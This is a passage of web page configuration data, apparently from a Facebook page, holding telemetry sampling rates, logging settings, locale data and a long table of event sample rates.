"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:729414", ["VisualCompletion"], {
"__rc": ["VisualCompletion",
"Aa3ueiFBVzBEijmA1YbM-WpjIgrGmiVG1e-G7u9XIUrFUWkK0cGWFh-aMlOhmx_BUqA3b23DMx1za52T-irSrTht"
]
}, -1],
["cr:1094907", [], {
"__rc": [null,
"Aa0s8m4kGLpkT6ui8wjFswK-HNu7yFUfzsX2LZp4r9FslmcMjdM1ZbRvXQ87zMunPrKhMhSUw4U-31QxS52V7kw"
]
}, -1],
["EventConfig", [], {
"sampling": {
"bandwidth": 0,
"play": 0,
"playing": 0,
"progress": 0,
"pause": 0,
"ended": 0,
"seeked": 0,
"seeking": 0,
"waiting": 0,
"loadedmetadata": 0,
"canplay": 0,
"selectionchange": 0,
"change": 0,
"timeupdate": 0,
"adaptation": 0,
"focus": 0,
"blur": 0,
"load": 0,
"error": 0,
"message": 0,
"abort": 0,
"storage": 0,
"scroll": 200000,
"mousemove": 20000,
"mouseover": 10000,
"mouseout": 10000,
"mousewheel": 1,
"MSPointerMove": 10000,
"keydown": 0.1,
"click": 0.02,
"mouseup": 0.02,
"__100ms": 0.001,
"__default": 5000,
"__min": 100,
"__interactionDefault": 200,
"__eventDefault": 100000
},
"page_sampling_boost": 1,
"interaction_regexes": {},
"interaction_boost": {},
"event_types": {},
"manual_instrumentation": false,
"profile_eager_execution": false,
"disable_heuristic": true,
"disable_event_profiler": true
}, 1726],
["AdsInterfacesSessionConfig", [], {}, 2393],
["BanzaiConfig", [], {
"MAX_SIZE": 10000,
"MAX_WAIT": 150000,
"RESTORE_WAIT": 150000,
"blacklist": ["time_spent"],
"gks": {
"boosted_pagelikes": true,
"mercury_send_error_logging": true,
"platform_oauth_client_events": true,
"visibility_tracking": true,
"graphexplorer": true,
"sticker_search_ranking": true
}
}, 7],
["LocaleInitialData", [], {
"locale": "en_GB",
"language": "English (UK)"
}, 273],
["QuickLogConfig", [], {
"qpl_events": {
"212543": {
"sampleRate": 250
},
"393276": {
"sampleRate": 50
},
"396252": {
"sampleRate": 50
},
"397979": {
"sampleRate": 50
},
"655575": {
"sampleRate": 1
},
"655576": {
"sampleRate": 5000
},
"655584": {
"sampleRate": 1
},
"655653": {
"sampleRate": 250
},
"663703": {
"sampleRate": 250
},
"917556": {
"sampleRate": 100
},
"917557": {
"sampleRate": 1000
},
"920349": {
"sampleRate": 100
},
"924733": {
"sampleRate": 100
},
"932588": {
"sampleRate": 100
},
"2101001": {
"sampleRate": 250
},
"2102327": {
"sampleRate": 50
},
"2103143": {
"sampleRate": 250
},
"2107124": {
"sampleRate": 1
},
"2108977": {
"sampleRate": 10
},
"2109054": {
"sampleRate": 250
},
"2112836": {
"sampleRate": 250
},
"3473463": {
"sampleRate": 10000
},
"3473464": {
"sampleRate": 10000
},
"3473465": {
"sampleRate": 10
},
"3735589": {
"sampleRate": 100
},
"3735590": {
"sampleRate": 1000
},
"3735591": {
"sampleRate": 100
},
"3735592": {
"sampleRate": 1000
},
"3735593": {
"sampleRate": 1000
},
"3735594": {
"sampleRate": 1000
},
"3735595": {
"sampleRate": 100
},
"3735596": {
"sampleRate": 1000
},
"3735597": {
"sampleRate": 1000
},
"3735598": {
"sampleRate": 100
},
"3735599": {
"sampleRate": 1000
},
"3735600": {
"sampleRate": 100
},
"3735601": {
"sampleRate": 100
},
"3735602": {
"sampleRate": 10000
},
"3735603": {
"sampleRate": 10000
},
"3735604": {
"sampleRate": 100
},
"3735605": {
"sampleRate": 100
},
"3735606": {
"sampleRate": 1
},
"3735608": {
"sampleRate": 250
},
"3735609": {
"sampleRate": 250
},
"3735610": {
"sampleRate": 250
},
"3735611": {
"sampleRate": 250
},
"3735612": {
"sampleRate": 250
},
"3735613": {
"sampleRate": 250
},
"3735614": {
"sampleRate": 250
},
"3735615": {
"sampleRate": 250
},
"3735616": {
"sampleRate": 250
},
"3735617": {
"sampleRate": 250
},
"3735618": {
"sampleRate": 50
},
"3735619": {
"sampleRate": 50
},
"3735620": {
"sampleRate": 50
},
"3735622": {
"sampleRate": 50
},
"3735623": {
"sampleRate": 500
},
"3735624": {
"sampleRate": 500
},
"3735625": {
"sampleRate": 1
},
"3735626": {
"sampleRate": 50
},
"3735627": {
"sampleRate": 50
},
"3735628": {
"sampleRate": 250
},
"7077894": {
"sampleRate": 1
},
"7079140": {
"sampleRate": 1
},
"7079214": {
"sampleRate": 100
},
"7079632": {
"sampleRate": 1
},
"7079838": {
"sampleRate": 1
},
"7079895": {
"sampleRate": 1
},
"7079940": {
"sampleRate": 1
},
"7081379": {
"sampleRate": 100
},
"7081993": {
"sampleRate": 1
},
"7081995": {
"sampleRate": 1
},
"7083043": {
"sampleRate": 100
},
"7083437": {
"sampleRate": 100
},
"7083693": {
"sampleRate": 100
},
"7083971": {
"sampleRate": 1
},
"7084033": {
"sampleRate": 100
},
"7084185": {
"sampleRate": 100
},
"7084444": {
"sampleRate": 1
},
"7084665": {
"sampleRate": 100
},
"7084786": {
"sampleRate": 1
},
"7085174": {
"sampleRate": 100
},
"7085268": {
"sampleRate": 100
},
"7086190": {
"sampleRate": 100
},
"7086630": {
"sampleRate": 100
},
"7087889": {
"sampleRate": 1
},
"7088719": {
"sampleRate": 1
},
"7088916": {
"sampleRate": 1
},
"7088929": {
"sampleRate": 1
},
"7088932": {
"sampleRate": 1
},
"7088956": {
"sampleRate": 1
},
"7089119": {
"sampleRate": 1
},
"7089521": {
"sampleRate": 100
},
"7089869": {
"sampleRate": 100
},
"7090129": {
"sampleRate": 1
},
"7091307": {
"sampleRate": 1
},
"7092490": {
"sampleRate": 1
},
"7092951": {
"sampleRate": 1
},
"7093431": {
"sampleRate": 100
},
"7093594": {
"sampleRate": 100
},
"7093622": {
"sampleRate": 1
},
"7093901": {
"sampleRate": 1
},
"7094174": {
"sampleRate": 100
},
"7733271": {
"sampleRate": 1
},
"7742652": {
"sampleRate": 1
},
"7746261": {
"sampleRate": 10
},
"7747170": {
"sampleRate": 100
},
"7747339": {
"sampleRate": 100
},
"7995400": {
"sampleRate": 1
},
"7995408": {
"sampleRate": 100
},
"11075649": {
"sampleRate": 1
},
"11075654": {
"sampleRate": 1
},
"11075674": {
"sampleRate": 1
},
"12451850": {
"sampleRate": 1
},
"12451854": {
"sampleRate": 1
},
"12451859": {
"sampleRate": 1
},
"12451868": {
"sampleRate": 1
},
"12451869": {
"sampleRate": 1
},
"12451873": {
"sampleRate": 10000
},
"12453291": {
"sampleRate": 1
},
"12454042": {
"sampleRate": 10000
},
"12454789": {
"sampleRate": 10000
},
"12457892": {
"sampleRate": 10000
},
"12457943": {
"sampleRate": 10000
},
"12458187": {
"sampleRate": 10000
},
"12462244": {
"sampleRate": 10000
},
"12463624": {
"sampleRate": 1
},
"12464511": {
"sampleRate": 10000
},
"12466919": {
"sampleRate": 10000
},
"13238313": {
"sampleRate": 100
},
"13238314": {
"sampleRate": 100
},
"13238353": {
"sampleRate": 100
},
"13238354": {
"sampleRate": 100
},
"13238355": {
"sampleRate": 100
},
"13238356": {
"sampleRate": 100
},
"13238392": {
"sampleRate": 100
},
"13238398": {
"sampleRate": 100
},
"13238399": {
"sampleRate": 100
},
"13238400": {
"sampleRate": 100
},
"13249850": {
"sampleRate": 100
},
"13250512": {
"sampleRate": 100
},
"13252240": {
"sampleRate": 100
},
"13252469": {
"sampleRate": 100
},
"17825794": {
"sampleRate": 250
},
"19146604": {
"sampleRate": 10
},
"19152862": {
"sampleRate": 5
},
"19216409": {
"sampleRate": 100
},
"20578320": {
"sampleRate": 1000000
},
"22347782": {
"sampleRate": 100
},
"22609921": {
"sampleRate": 10000
},
"22675460": {
"sampleRate": 250
},
"23265284": {
"sampleRate": 1
},
"23265285": {
"sampleRate": 1
},
"23265286": {
"sampleRate": 1
},
"23281892": {
"sampleRate": 1
},
"23285466": {
"sampleRate": 1
},
"23461896": {
"sampleRate": 1
},
"23461898": {
"sampleRate": 1
},
"23461899": {
"sampleRate": 10000
},
"23461900": {
"sampleRate": 1
},
"23461901": {
"sampleRate": 1
},
"23461902": {
"sampleRate": 1
},
"23473227": {
"sampleRate": 1
},
"23476559": {
"sampleRate": 1
},
"23491362": {
"sampleRate": 1
},
"23855114": {
"sampleRate": 1
},
"25296897": {
"sampleRate": 1
},
"25296900": {
"sampleRate": 10000
},
"25296901": {
"sampleRate": 1
},
"25296902": {
"sampleRate": 1
},
"25296903": {
"sampleRate": 10000
},
"25296904": {
"sampleRate": 10000
},
"25296905": {
"sampleRate": 10000
},
"25296906": {
"sampleRate": 10000
},
"25304023": {
"sampleRate": 10000
},
"25305590": {
"sampleRate": 1000
},
"26869761": {
"sampleRate": 1
},
"26869762": {
"sampleRate": 1
},
"26869763": {
"sampleRate": 1
},
"26869764": {
"sampleRate": 1
},
"26869766": {
"sampleRate": 1
},
"26869768": {
"sampleRate": 1
},
"26869770": {
"sampleRate": 1
},
"26869771": {
"sampleRate": 1
},
"26877377": {
"sampleRate": 1
},
"26878862": {
"sampleRate": 1
},
"26881111": {
"sampleRate": 1
},
"26882160": {
"sampleRate": 1
},
"26883711": {
"sampleRate": 1
},
"26885348": {
"sampleRate": 1
},
"26898960": {
"sampleRate": 1
},
"27459588": {
"sampleRate": 5000
},
"27459589": {
"sampleRate": 1
},
"27459590": {
"sampleRate": 10
},
"27459591": {
"sampleRate": 1
},
"27787270": {
"sampleRate": 1000000
},
"27787271": {
"sampleRate": 10000
},
"27983873": {
"sampleRate": 1
},
"27983874": {
"sampleRate": 1
},
"27983875": {
"sampleRate": 1
},
"27983876": {
"sampleRate": 1
},
"27983877": {
"sampleRate": 1
},
"29047276": {
"sampleRate": 10000
},
"29818881": {
"sampleRate": 1
},
"29818882": {
"sampleRate": 1
},
"29818883": {
"sampleRate": 1
},
"29818884": {
"sampleRate": 1
},
"29949953": {
"sampleRate": 1
},
"29949955": {
"sampleRate": 1
},
"30408705": {
"sampleRate": 1
},
"30408706": {
"sampleRate": 1
},
"30408707": {
"sampleRate": 1
},
"30408708": {
"sampleRate": 1
},
"30408709": {
"sampleRate": 1
},
"30408710": {
"sampleRate": 1
},
"30408711": {
"sampleRate": 1
},
"30408712": {
"sampleRate": 1
},
"30421153": {
"sampleRate": 1
},
"30605313": {
"sampleRate": 100
},
"30605314": {
"sampleRate": 100
},
"30605315": {
"sampleRate": 100
},
"30605316": {
"sampleRate": 1
},
"30605317": {
"sampleRate": 1
},
"30605319": {
"sampleRate": 1
},
"30605320": {
"sampleRate": 1
},
"30605321": {
"sampleRate": 1
},
"30605322": {
"sampleRate": 1
},
"30605323": {
"sampleRate": 1
},
"30605324": {
"sampleRate": 1
},
"30605325": {
"sampleRate": 1
},
"30605326": {
"sampleRate": 1
},
"30605328": {
"sampleRate": 1
},
"30605329": {
"sampleRate": 1
},
"30605330": {
"sampleRate": 1
},
"30605331": {
"sampleRate": 1
},
"30605333": {
"sampleRate": 1
},
"30605334": {
"sampleRate": 1
},
"30605335": {
"sampleRate": 1
},
"30605336": {
"sampleRate": 1
},
"30605337": {
"sampleRate": 1
},
"30605338": {
"sampleRate": 1
},
"30605339": {
"sampleRate": 1
},
"30605340": {
"sampleRate": 1
},
"30605341": {
"sampleRate": 1
},
"30605342": {
"sampleRate": 1
},
"30605343": {
"sampleRate": 1
},
"30605344": {
"sampleRate": 1
},
"30605345": {
"sampleRate": 1
},
"30605346": {
"sampleRate": 1
},
"30605347": {
"sampleRate": 1
},
"30605348": {
"sampleRate": 1
},
"30605349": {
"sampleRate": 1
},
"30605350": {
"sampleRate": 1
},
"30605351": {
"sampleRate": 1
},
"30605352": {
"sampleRate": 1
},
"30605353": {
"sampleRate": 1
},
"30605354": {
"sampleRate": 1
},
"30605355": {
"sampleRate": 1
},
"30605356": {
"sampleRate": 1
},
"30605357": {
"sampleRate": 1
},
"30605358": {
"sampleRate": 1
},
"30605360": {
"sampleRate": 1
},
"30605361": {
"sampleRate": 1
},
"30605362": {
"sampleRate": 1
},
"30605363": {
"sampleRate": 1
},
"30605364": {
"sampleRate": 1
},
"30605366": {
"sampleRate": 1
},
"30605367": {
"sampleRate": 1
},
"30605368": {
"sampleRate": 1
},
"30605369": {
"sampleRate": 1
},
"30605370": {
"sampleRate": 1
},
"30605371": {
"sampleRate": 1
},
"30605373": {
"sampleRate": 1
},
"30605374": {
"sampleRate": 1
},
"30605375": {
"sampleRate": 1
},
"30605376": {
"sampleRate": 1
},
"30605378": {
"sampleRate": 1
},
"30605380": {
"sampleRate": 1
},
"30605381": {
"sampleRate": 1
},
"30605382": {
"sampleRate": 1
},
"30605384": {
"sampleRate": 1
},
"30605386": {
"sampleRate": 1
},
"30605387": {
"sampleRate": 1
},
"30605389": {
"sampleRate": 1
},
"30605390": {
"sampleRate": 1
},
"30605391": {
"sampleRate": 1
},
"30605392": {
"sampleRate": 1
},
"30605393": {
"sampleRate": 1
},
"30615365": {
"sampleRate": 1
},
"30615438": {
"sampleRate": 1
},
"30616610": {
"sampleRate": 1
},
"30617968": {
"sampleRate": 1
},
"30618398": {
"sampleRate": 1
},
"30620813": {
"sampleRate": 1
},
"30621572": {
"sampleRate": 1
},
"30632331": {
"sampleRate": 1
},
"32312156": {
"sampleRate": 1
},
"32374785": {
"sampleRate": 10000
},
"32702465": {
"sampleRate": 1
},
"33488897": {
"sampleRate": 1
},
"33488898": {
"sampleRate": 1
},
"33488900": {
"sampleRate": 1
},
"33488901": {
"sampleRate": 1800
},
"33488902": {
"sampleRate": 1
},
"33488903": {
"sampleRate": 1
},
"33488904": {
"sampleRate": 1
},
"33488905": {
"sampleRate": 1
},
"33494245": {
"sampleRate": 1
},
"33619969": {
"sampleRate": 1
},
"35586051": {
"sampleRate": 10
},
"35586052": {
"sampleRate": 1000
},
"35586053": {
"sampleRate": 1000
},
"35651588": {
"sampleRate": 1
},
"35651590": {
"sampleRate": 1
},
"35651591": {
"sampleRate": 1
},
"35651593": {
"sampleRate": 1
},
"35651594": {
"sampleRate": 1
},
"35651595": {
"sampleRate": 1
},
"35651596": {
"sampleRate": 1
},
"36110337": {
"sampleRate": 1
},
"36110338": {
"sampleRate": 1
},
"36110339": {
"sampleRate": 1
},
"36241413": {
"sampleRate": 1
},
"36241422": {
"sampleRate": 1
},
"36241423": {
"sampleRate": 1
},
"36241434": {
"sampleRate": 1
},
"36243184": {
"sampleRate": 1
},
"36244063": {
"sampleRate": 1
},
"36246584": {
"sampleRate": 1
},
"36247076": {
"sampleRate": 1
},
"36247834": {
"sampleRate": 1
},
"36249481": {
"sampleRate": 1
},
"36250226": {
"sampleRate": 1
},
"36256069": {
"sampleRate": 1
},
"36257380": {
"sampleRate": 1
},
"36306945": {
"sampleRate": 1
},
"36306946": {
"sampleRate": 1
},
"36306948": {
"sampleRate": 1
},
"36306951": {
"sampleRate": 1000
},
"36306952": {
"sampleRate": 1
},
"36306955": {
"sampleRate": 1
},
"36306958": {
"sampleRate": 1
},
"37101248": {
"sampleRate": 10000
},
"37158913": {
"sampleRate": 1
},
"37158914": {
"sampleRate": 1
},
"37158915": {
"sampleRate": 1
},
"37158916": {
"sampleRate": 1
},
"37224449": {
"sampleRate": 10000
},
"37224450": {
"sampleRate": 10000
},
"37224451": {
"sampleRate": 10000
},
"37224452": {
"sampleRate": 10000
},
"37224453": {
"sampleRate": 10000
},
"37224454": {
"sampleRate": 10000
},
"37224455": {
"sampleRate": 10000
},
"37224456": {
"sampleRate": 10000
},
"37224457": {
"sampleRate": 10000
},
"37289985": {
"sampleRate": 1
},
"37289986": {
"sampleRate": 1
},
"37289987": {
"sampleRate": 1
},
"37289990": {
"sampleRate": 1
},
"37289991": {
"sampleRate": 1
},
"37289992": {
"sampleRate": 1
},
"37631558": {
"sampleRate": 100
},
"37814273": {
"sampleRate": 1
},
"37814274": {
"sampleRate": 1
},
"37814275": {
"sampleRate": 1
},
"38209779": {
"sampleRate": 100
},
"38212112": {
"sampleRate": 100
},
"38212473": {
"sampleRate": 100
},
"38220042": {
"sampleRate": 100
},
"38338561": {
"sampleRate": 10000
},
"38338562": {
"sampleRate": 10000
},
"38338563": {
"sampleRate": 10000
},
"38338564": {
"sampleRate": 1
},
"38928385": {
"sampleRate": 1
},
"39976964": {
"sampleRate": 2
},
"39976965": {
"sampleRate": 2
},
"39976966": {
"sampleRate": 1
},
"39976967": {
"sampleRate": 2
},
"40173575": {
"sampleRate": 1000
},
"40501249": {
"sampleRate": 1
},
"40501250": {
"sampleRate": 1
},
"40501251": {
"sampleRate": 1
},
"40501252": {
"sampleRate": 1
},
"40501253": {
"sampleRate": 1
},
"40501254": {
"sampleRate": 1
},
"40501255": {
"sampleRate": 1
},
"40840748": {
"sampleRate": 1
},
"40841422": {
"sampleRate": 1
},
"40843772": {
"sampleRate": 1
},
"40894467": {
"sampleRate": 1
},
"40894468": {
"sampleRate": 1
},
"40894469": {
"sampleRate": 1
},
"40894470": {
"sampleRate": 1
},
"40894471": {
"sampleRate": 1
},
"40894472": {
"sampleRate": 1
},
"40894473": {
"sampleRate": 1
},
"40894474": {
"sampleRate": 1
},
"40894475": {
"sampleRate": 1
},
"40894483": {
"sampleRate": 1
},
"40894484": {
"sampleRate": 1
},
"40894485": {
"sampleRate": 1
},
"40894486": {
"sampleRate": 1
},
"40894487": {
"sampleRate": 1
},
"40894490": {
"sampleRate": 1
},
"40894491": {
"sampleRate": 1
},
"40894492": {
"sampleRate": 1
},
"40894493": {
"sampleRate": 1
},
"40894494": {
"sampleRate": 1
},
"40894495": {
"sampleRate": 1
},
"40894496": {
"sampleRate": 1
},
"40894497": {
"sampleRate": 1
},
"40894498": {
"sampleRate": 1
},
"40894499": {
"sampleRate": 1
},
"40894500": {
"sampleRate": 1
},
"40894501": {
"sampleRate": 1
},
"40894502": {
"sampleRate": 1
},
"40905691": {
"sampleRate": 1
},
"40910623": {
"sampleRate": 1
},
"40913765": {
"sampleRate": 1
},
"40919892": {
"sampleRate": 1
},
"41484289": {
"sampleRate": 2
},
"41484290": {
"sampleRate": 100
},
"41484291": {
"sampleRate": 100
},
"41484292": {
"sampleRate": 100
},
"41484293": {
"sampleRate": 100
},
"41484294": {
"sampleRate": 200
},
"41484295": {
"sampleRate": 100
},
"41484296": {
"sampleRate": 100
},
"41484297": {
"sampleRate": 100
},
"41484298": {
"sampleRate": 100
},
"41484299": {
"sampleRate": 100
},
"41484300": {
"sampleRate": 100
},
"41484301": {
"sampleRate": 1
},
"41484302": {
"sampleRate": 100
},
"41484303": {
"sampleRate": 100
},
"41484304": {
"sampleRate": 100
},
"41484306": {
"sampleRate": 100
},
"41484307": {
"sampleRate": 100
},
"41484308": {
"sampleRate": 100
},
"41484309": {
"sampleRate": 10
},
"41484310": {
"sampleRate": 10
},
"41484311": {
"sampleRate": 1
},
"41484313": {
"sampleRate": 1
},
"41484314": {
"sampleRate": 1
},
"41484315": {
"sampleRate": 100
},
"41484317": {
"sampleRate": 100
},
"41484318": {
"sampleRate": 20
},
"41485898": {
"sampleRate": 10
},
"41486225": {
"sampleRate": 100
},
"41486524": {
"sampleRate": 1
},
"41487618": {
"sampleRate": 100
},
"41488847": {
"sampleRate": 1
},
"41490105": {
"sampleRate": 1
},
"41490114": {
"sampleRate": 100
},
"41490310": {
"sampleRate": 100
},
"41491162": {
"sampleRate": 1
},
"41491369": {
"sampleRate": 10
},
"41491493": {
"sampleRate": 1
},
"41491663": {
"sampleRate": 2
},
"41492048": {
"sampleRate": 1
},
"41492124": {
"sampleRate": 1
},
"41492280": {
"sampleRate": 100
},
"41493161": {
"sampleRate": 100
},
"41493580": {
"sampleRate": 100
},
"41494292": {
"sampleRate": 100
},
"41495214": {
"sampleRate": 100
},
"41495478": {
"sampleRate": 1
},
"41495493": {
"sampleRate": 1
},
"41495649": {
"sampleRate": 1
},
"41497784": {
"sampleRate": 100
},
"41498606": {
"sampleRate": 10
},
"41499313": {
"sampleRate": 100
},
"41500090": {
"sampleRate": 100
},
"41500162": {
"sampleRate": 1
},
"41506813": {
"sampleRate": 250
},
"41549825": {
"sampleRate": 1
},
"41811969": {
"sampleRate": 1
},
"41811970": {
"sampleRate": 1
},
"41811971": {
"sampleRate": 1
},
"42403339": {
"sampleRate": 1
},
"42406132": {
"sampleRate": 1
},
"42408939": {
"sampleRate": 1
},
"42411149": {
"sampleRate": 1
},
"42417878": {
"sampleRate": 1
},
"42532865": {
"sampleRate": 1000
},
"42532866": {
"sampleRate": 10000
},
"42729476": {
"sampleRate": 1
},
"42729477": {
"sampleRate": 1
},
"42729478": {
"sampleRate": 1
},
"42738840": {
"sampleRate": 1
},
"44040193": {
"sampleRate": 1
},
"44040194": {
"sampleRate": 1
},
"44040198": {
"sampleRate": 1
},
"44433409": {
"sampleRate": 1
},
"44433410": {
"sampleRate": 1
},
"44433411": {
"sampleRate": 1
},
"44892162": {
"sampleRate": 1
},
"44892163": {
"sampleRate": 1
},
"44892165": {
"sampleRate": 5
},
"44892166": {
"sampleRate": 5
},
"44957701": {
"sampleRate": 1
},
"44957702": {
"sampleRate": 1
},
"45088770": {
"sampleRate": 1
},
"45613057": {
"sampleRate": 1
},
"45613058": {
"sampleRate": 1
},
"45613059": {
"sampleRate": 1
},
"45678593": {
"sampleRate": 1
},
"45678594": {
"sampleRate": 100
},
"45683010": {
"sampleRate": 100
},
"46596097": {
"sampleRate": 1
},
"47841281": {
"sampleRate": 1
},
"47841282": {
"sampleRate": 1
},
"47841283": {
"sampleRate": 1
},
"48496641": {
"sampleRate": 1
},
"48758785": {
"sampleRate": 1
},
"48758786": {
"sampleRate": 1
},
"49283073": {
"sampleRate": 1
},
"49283075": {
"sampleRate": 100
},
"49284811": {
"sampleRate": 100
},
"49285023": {
"sampleRate": 100
},
"49290075": {
"sampleRate": 100
},
"49290201": {
"sampleRate": 100
},
"49290284": {
"sampleRate": 100
},
"49290401": {
"sampleRate": 100
},
"49290951": {
"sampleRate": 100
},
"49291043": {
"sampleRate": 100
},
"49291264": {
"sampleRate": 100
},
"49294705": {
"sampleRate": 100
},
"49294997": {
"sampleRate": 100
},
"49295194": {
"sampleRate": 100
},
"49296905": {
"sampleRate": 100
},
"49298279": {
"sampleRate": 100
},
"49479681": {
"sampleRate": 1
},
"49479683": {
"sampleRate": 1
},
"49479684": {
"sampleRate": 1
},
"49479685": {
"sampleRate": 1
},
"49481946": {
"sampleRate": 1
},
"49490667": {
"sampleRate": 1
},
"49493231": {
"sampleRate": 1
},
"50003969": {
"sampleRate": 1
},
"50003970": {
"sampleRate": 1
},
"50003971": {
"sampleRate": 1
},
"50003972": {
"sampleRate": 1
},
"50003973": {
"sampleRate": 1
},
"50003974": {
"sampleRate": 1
},
"50135049": {
"sampleRate": 1
},
"50987009": {
"sampleRate": 1
},
"50987010": {
"sampleRate": 1
},
"51452317": {
"sampleRate": 100
},
"51455798": {
"sampleRate": 100
},
"51459017": {
"sampleRate": 100
},
"51459249": {
"sampleRate": 100
},
"52035585": {
"sampleRate": 1
},
"52690945": {
"sampleRate": 1
},
"52690946": {
"sampleRate": 1
},
"52690947": {
"sampleRate": 1
},
"52690948": {
"sampleRate": 1
},
"52690949": {
"sampleRate": 1
},
"52690950": {
"sampleRate": 1
},
"52694580": {
"sampleRate": 1
},
"52698112": {
"sampleRate": 1
},
"52701974": {
"sampleRate": 1
},
"52705483": {
"sampleRate": 1
},
"52706253": {
"sampleRate": 1
},
"52709001": {
"sampleRate": 1
},
"52710195": {
"sampleRate": 1
},
"52711372": {
"sampleRate": 1
},
"52711928": {
"sampleRate": 1
},
"52712329": {
"sampleRate": 1
},
"52717731": {
"sampleRate": 1
},
"52719193": {
"sampleRate": 1
},
"52720775": {
"sampleRate": 1
},
"52722738": {
"sampleRate": 1
},
"52756481": {
"sampleRate": 1
},
"52887553": {
"sampleRate": 1
},
"52887555": {
"sampleRate": 1
},
"52887556": {
"sampleRate": 1
},
"52887557": {
"sampleRate": 1
},
"52887559": {
"sampleRate": 1
},
"52887560": {
"sampleRate": 1
},
"52887561": {
"sampleRate": 1
},
"52887562": {
"sampleRate": 1
},
"52887563": {
"sampleRate": 1
},
"52887564": {
"sampleRate": 1
},
"52887565": {
"sampleRate": 1
},
"52887566": {
"sampleRate": 1
},
"52887567": {
"sampleRate": 1
},
"52887568": {
"sampleRate": 1
},
"52887569": {
"sampleRate": 1
},
"52887570": {
"sampleRate": 1
},
"52887571": {
"sampleRate": 1
},
"52887572": {
"sampleRate": 1
},
"52887573": {
"sampleRate": 1
},
"52887574": {
"sampleRate": 1
},
"52887575": {
"sampleRate": 1
},
"52887576": {
"sampleRate": 1
},
"52887577": {
"sampleRate": 1
},
"52887578": {
"sampleRate": 1
},
"52887579": {
"sampleRate": 1
},
"52887580": {
"sampleRate": 1
},
"52887581": {
"sampleRate": 1
},
"52887582": {
"sampleRate": 1
},
"52887583": {
"sampleRate": 1
},
"52887584": {
"sampleRate": 1
},
"52887585": {
"sampleRate": 1
},
"52887586": {
"sampleRate": 1
},
"52887587": {
"sampleRate": 1
},
"52888679": {
"sampleRate": 1
},
"52890296": {
"sampleRate": 1
},
"52891792": {
"sampleRate": 1
},
"52892954": {
"sampleRate": 1
},
"52893664": {
"sampleRate": 1
},
"52894986": {
"sampleRate": 1
},
"52895164": {
"sampleRate": 1
},
"52896044": {
"sampleRate": 1
},
"52896424": {
"sampleRate": 1
},
"52897225": {
"sampleRate": 1
},
"52898380": {
"sampleRate": 1
},
"52899465": {
"sampleRate": 1
},
"52899570": {
"sampleRate": 1
},
"52900219": {
"sampleRate": 1
},
"52900550": {
"sampleRate": 1
},
"52900739": {
"sampleRate": 1
},
"52901539": {
"sampleRate": 1
},
"52901642": {
"sampleRate": 1
},
"52903160": {
"sampleRate": 1
},
"52910634": {
"sampleRate": 1
},
"53018625": {
"sampleRate": 1
},
"53222086": {
"sampleRate": 10
},
"53346305": {
"sampleRate": 1
},
"53346306": {
"sampleRate": 1
},
"53346307": {
"sampleRate": 1
},
"53346308": {
"sampleRate": 1
},
"53346309": {
"sampleRate": 1
},
"53346310": {
"sampleRate": 1
},
"53346311": {
"sampleRate": 1
},
"53346312": {
"sampleRate": 1
},
"53346313": {
"sampleRate": 1
},
"53346314": {
"sampleRate": 1
},
"53346315": {
"sampleRate": 1
},
"53348255": {
"sampleRate": 1
},
"53349360": {
"sampleRate": 1
},
"53350227": {
"sampleRate": 1
},
"53351604": {
"sampleRate": 1
},
"53352841": {
"sampleRate": 1
},
"53354745": {
"sampleRate": 1
},
"53359547": {
"sampleRate": 1
},
"53359965": {
"sampleRate": 1
},
"53542913": {
"sampleRate": 1
},
"53542914": {
"sampleRate": 1
},
"53542915": {
"sampleRate": 1
},
"53542916": {
"sampleRate": 1
},
"53608449": {
"sampleRate": 1
},
"53608450": {
"sampleRate": 1
},
"53608451": {
"sampleRate": 1
},
"53805057": {
"sampleRate": 1
},
"53805058": {
"sampleRate": 1
},
"53805059": {
"sampleRate": 1
},
"53805060": {
"sampleRate": 1
},
"53807173": {
"sampleRate": 1
},
"53817004": {
"sampleRate": 1
},
"53820636": {
"sampleRate": 1
},
"54132737": {
"sampleRate": 100
},
"54198273": {
"sampleRate": 1
},
"54198274": {
"sampleRate": 1
},
"54203833": {
"sampleRate": 1
},
"54205001": {
"sampleRate": 1
},
"54263809": {
"sampleRate": 1
},
"54263810": {
"sampleRate": 1
},
"54263811": {
"sampleRate": 1
},
"54263812": {
"sampleRate": 1
},
"54263813": {
"sampleRate": 1
},
"54263814": {
"sampleRate": 1
},
"54263815": {
"sampleRate": 1
},
"54263816": {
"sampleRate": 1
},
"54263817": {
"sampleRate": 1
},
"54263818": {
"sampleRate": 1
},
"54263819": {
"sampleRate": 1
},
"54263820": {
"sampleRate": 1
},
"54266075": {
"sampleRate": 1
},
"54266141": {
"sampleRate": 1
},
"54266824": {
"sampleRate": 1
},
"54285047": {
"sampleRate": 1
},
"54287428": {
"sampleRate": 1
},
"54525953": {
"sampleRate": 2
},
"54525954": {
"sampleRate": 1
},
"54525955": {
"sampleRate": 1
},
"54525956": {
"sampleRate": 1
},
"54525957": {
"sampleRate": 1
},
"54525958": {
"sampleRate": 1
},
"54525959": {
"sampleRate": 1
},
"54657025": {
"sampleRate": 10000
},
"54657026": {
"sampleRate": 10000
},
"54657027": {
"sampleRate": 10000
},
"54657028": {
"sampleRate": 10000
},
"54657029": {
"sampleRate": 10000
},
"54657030": {
"sampleRate": 10000
},
"54853633": {
"sampleRate": 1
},
"54853634": {
"sampleRate": 1
},
"54856934": {
"sampleRate": 1
},
"54864546": {
"sampleRate": 1
},
"54919169": {
"sampleRate": 1
},
"54919170": {
"sampleRate": 1
},
"54919171": {
"sampleRate": 1
},
"54919172": {
"sampleRate": 1
},
"54919173": {
"sampleRate": 1
},
"54919174": {
"sampleRate": 1
},
"54919175": {
"sampleRate": 1
},
"54919176": {
"sampleRate": 1
},
"54919177": {
"sampleRate": 1
},
"54919178": {
"sampleRate": 1
},
"54919179": {
"sampleRate": 1
},
"54919180": {
"sampleRate": 1
},
"54919181": {
"sampleRate": 1
},
"54919182": {
"sampleRate": 1
},
"54919183": {
"sampleRate": 1
},
"54919184": {
"sampleRate": 1
},
"54919185": {
"sampleRate": 1
},
"54919186": {
"sampleRate": 1
},
"54919187": {
"sampleRate": 1
},
"54919188": {
"sampleRate": 1
},
"54919189": {
"sampleRate": 1
},
"54919190": {
"sampleRate": 1
},
"54919191": {
"sampleRate": 1
},
"54919192": {
"sampleRate": 1
},
"54919193": {
"sampleRate": 1
},
"54919194": {
"sampleRate": 1
},
"54919195": {
"sampleRate": 1
},
"54919196": {
"sampleRate": 1
},
"54919197": {
